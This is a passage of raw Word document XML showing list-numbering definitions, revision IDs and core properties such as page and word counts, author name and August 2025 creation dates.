    <w:lvl w:ilvl="0" w:tplc="E872FFAE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129EF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1220B0EC"/>
    <w:lvl w:ilvl="0" w:tplc="F1D29622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F4B74"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5992A396"/>
    <w:lvl w:ilvl="0" w:tplc="3A6224CE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74BB1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C53C316A"/>
    <w:lvl w:ilvl="0" w:tplc="5DD2C12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81AAC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="27BA6DCC"/>
    <w:lvl w:ilvl="0" w:tplc="04849540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7314B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="718EF1F8"/>
    <w:lvl w:ilvl="0" w:tplc="07F48CB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66478"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3866011C"/>
    <w:lvl w:ilvl="0" w:tplc="877AD57A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093291">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1719548644">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="661394566">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="983660610">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="591625964">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1757551017">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="511188913">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="588124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D3"/>
    <w:rsid w:val="00035143"/>
    <w:rsid w:val="002E252D"/>
    <w:rsid w:val="0034564F"/>
    <w:rsid w:val="00462DB4"/>
    <w:rsid w:val="00833A60"/>
    <w:rsid w:val="008F27F1"/>
    <w:rsid w:val="009E4A8D"/>
    <w:rsid w:val="00A43DAF"/>
    <w:rsid w:val="00A73EDD"/>
    <w:rsid w:val="00AE7386"/>
    <w:rsid w:val="00B305D3"/>
    <w:rsid w:val="00B45AFD"/>
    <w:rsid w:val="00B93280"/>
    <w:rsid w:val="00CD04F9"/>
    <w:rsid w:val="00EC4813"/>
    <w:rsid w:val="00FC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1A03"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{29320A97-CCC3-4528-A0E8-0BEF3244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4F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5D3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D3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D3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D3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D3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D3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D3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D3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D3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D3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D3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D3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D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D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16</Pages>
  <Words>2887</Words>
  <Characters>16457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Adwitya Verma</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Adwitya Verma</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-15T06:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-15T11:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>